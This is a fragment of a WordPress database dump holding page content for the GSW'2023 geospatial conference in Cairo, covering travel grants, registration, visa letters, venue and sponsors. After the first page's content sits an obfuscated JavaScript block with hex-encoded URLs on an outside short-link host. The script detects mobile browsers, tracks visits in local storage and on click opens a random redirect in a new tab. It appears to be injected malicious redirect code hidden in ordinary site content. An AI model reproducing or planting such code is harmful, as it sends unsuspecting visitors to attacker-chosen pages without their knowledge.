timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:08:36','2023-06-09 22:08:36','',3066,'https://gsw2023.com/?p=4670',0,'revision','',0),
(4671,1,'2023-06-09 22:09:04','2023-06-09 22:09:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter 